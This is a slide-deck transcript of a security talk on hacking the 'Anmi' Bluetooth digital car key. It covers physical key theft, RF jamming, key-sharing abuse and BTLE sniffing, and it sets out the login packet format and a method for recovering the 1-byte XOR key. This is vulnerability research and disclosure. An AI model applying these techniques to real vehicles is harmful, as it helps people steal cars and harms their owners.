![Login Packet:
+0 byte channel 0xA1
+1 short len fixed in 0301: 43 00
+3 short crc16
+5 short protocolver 0301
+7 byte usertype
+8 uchar[16] password
+24 uchar[16] enc_md5_username
+40 uchar[16] enc_md5_imei
+56 uchar[6] enc_advertising_key //ascii
+62 uchar[6] enc_date // YYMMDDHHMMSS
+68 uchar enc_openrssi
+69 uchar enc_lockRssi
What we need is to decrypt only 1 byte
Login -- Encryption
What year now ?](https://image.slidesharecdn.com/grand-theft-auto-digital-key-hacking-180822094109/85/Grand-theft-auto-digital-key-hacking-67-320.jpg)
![Login Firmware Inspection
Flag[1] is set only when Anmi-Key
is fully assembled](https://image.slidesharecdn.com/grand-theft-auto-digital-key-hacking-180822094109/85/Grand-theft-auto-digital-key-hacking-71-320.jpg)
Grand theft-auto-digital-key-hacking
- 1. GRAND THEFT AUTO DIGITAL KEY HACKING @Kevin2600 @MonkeyKing
- 3. Agenda: . Introduction -- Keyfobs 101 . Structure & Functions -- Anmi-Key . Analysis & Attack vectors -- Anmi-Key . A0 -- Physical Access . A1 -- RF Jamming Attack . A2 -- Key-Sharing Analysis . A3 -- BTLE Sniffing & Decryption
- 4. Introduction
- 5. . Mechanical Key Entry . Remote Key Entry (Infrared; Fixed; Rolling) . Passive Key Entry (Transponder RFID) . Digital Key Entry (Mobile phone as Key) Car-Keyfobs
- 6. New Trend ?
- 7. . RKE KeeLoq algorithm cracked (2008) . Passive Keyless entry Keyfob Relay attack (2012) . Gone in 60 seconds -- Hijacking with Hitag2 (2012) . Samy's Rolljam -- Drive it like you hacked it (2015) . BMW ConnectedDrive -- Telematics hacked (2015) . Mitsubishi Outlander WIFI Hacked -- PenTestPartners (2016) . 14 vulnerabilities found in BMW connected cars -- KeenLab (2018) What Hacked ?
- 8. . Dieter Spaar discovered BMW ConnectedDrive that allowed him to remotely open the vehicles lock . Simulated a mobile network in a test environment with OpenBSC . After triggered by a decrypted SMS message. The vehicle sent a simple HTTP GET request to the server, in order to retrieve unlock command New trend New hack - 2015 http://tiny.cc/bmwconnectedrive
- 9. . Mitsubishi Outlander PHEV Top Selling hybrid SUV. Control of the car by WiFi access point . Unique SSID (REMOTEnnaaaa) Easy to locate on wigle.net. The Wi-Fi PSK is too short to crack .Controlling protocols are reverse engineered. Turn on/off Air-condition; Heating; Lights and Alarm !!! New trend New hack - 2016 http://tiny.cc/pentestpartners-Outlander
- 10. Structure & Functions -- Anmi
- 11. Digital Car key -- Anmi
- 12. Features : Keyless Entrance System : Keyless Engine Start/Stop : Bluetooth Low Energy 4.0 : Auto Lock/Unlock Function : Mobile as Key (Android; Iphone) : Remote Keys Sharing (20 Users)
- 13. Components
- 14. Key-Pairing
- 15. Car-Models
- 16. Internal 1
- 17. Internal 2
- 18. Internal 3 B T L E - M o d u l e ( C C 2 6 4 0 ) t o communicate with mobile APP through 2.4ghz RF-Module(NXP-61X0915) Emits unlock/lock cmd to the vehicle. RF-module vary from different car models BTLE-Module (SYD8801) sensor. 2.4GHz BTLE SOC 32-bit ARM Cortex-M0. Functionality unknown ?
- 19. Mystery Sensor ?
- 20. Mystery Sensor ?
- 21. RF-Module Oscillator: 13.560Mhz Math: 13.560MHz / 8000 = 1695hz 13.560MHz * 32 = 433.92Mhz
- 22. SDR-HackRF
- 23. SDR-GQRX
- 24. BTLE-Module
- 25. BTLE-Interactive
- 26. BTLE-HCI-log
- 27. Mobile APP
- 28. Mobile APP - Codes
- 29. Mobile APP - Codes
- 30. Mobile APP - MitMProxy
- 31. Mobile APP - MitMProxy
- 32. Mobile APP - Server Say Bye Bye to your Privacy ..
- 33. Encryption ?
- 34. Super Secure ?
- 36. A0 -- Physical access
- 37. . Anmi-Key by request, always left in the car . Breaking glass by force. Get the Anmi-Key to ulock the door . Desolder the Registered Anmi chip and Mechanical Key put it into a blank key . Or use self design board to emits unlock cmd to the vehicle by RF-module . Start the engine and run away Old School way
- 38. DEMO
- 39. A1 -- RF Jamming
- 40. RF-Jammer
- 41. RF-Jammer
- 42. Does Anmi-Key smart enough to avoid this ?
- 43. One way communication ..
- 44. DEMO
- 45. What's Next DRIVE IT LIKE YOU HACKED IT @SamyKamkar
- 46. A2 -- Key-Sharing Analysis
- 47. Features
- 48. Analysis
- 49. What could possibly go wrong ?
- 52. DEMO
- 53. Let's cancel it then ?
- 54. DEMO
- 55. Let's wait until it expired ?
- 56. DEMO
- 57. A3 -- BTLE Sniffing & Decryption
- 58. Where is the Secure Encryption ?
- 59. BTLE -- Analysis
- 60. BTLE -- Analysis
- 61. BTLE -- Analysis
- 62. BTLE -- 1st Attempt
- 63. BTLE -- Login Steps
- 65. BTLE -- Login Protocol Fetch a random values from Anmi-Key (4 bytes) Calculate EncryptionCode (Random Value; Secret Key) Wrap up to make an encrypted login packets Send to Anmi-Key and Log in (Status 0xAA)
- 66. Only 1 byte key needed Login -- Encryption Arg6 is a Dword random from fetch random SecretKey is a fixed random Dword number from device Initialization
- 67. Login Packet: +0 byte channel 0xA1 +1 short len fixed in 0301: 43 00 +3 short crc16 +5 short protocolver 0301 +7 byte usertype +8 uchar[16] password +24 uchar[16] enc_md5_username +40 uchar[16] enc_md5_imei +56 uchar[6] enc_advertising_key //ascii +62 uchar[6] enc_date // YYMMDDHHMMSS +68 uchar enc_openrssi +69 uchar enc_lockRssi What we need is to decrypt only 1 byte Login -- Encryption What year now ?
- 68. Recover EncryptCode with a fixed year data: 0x12 Then You can get: Login -- Encryption
- 69. Login Crafting Packets
- 70. Login Crafting Packets Error Code 0x66 ???
- 71. Login Firmware Inspection Flag[1] is set only when Anmi-Key is fully assembled
- 72. Login Crafting Packets
- 73. Login -- Sniffing Packets
- 74. Login -- Sniffing Packets
- 75. Login -- Encryption . 1-byte of encryption key . XOR as the super secure encryption algorithm . Easy to recover by sniffing the BTLE packets
- 76. DEMO
- 77. Report for CVE ?
- 78. Conclusion: . Security by obscurity !? . Dont trust the user input . New trends come with new hacks . Test the product properly, before going on market
- 79. Question ?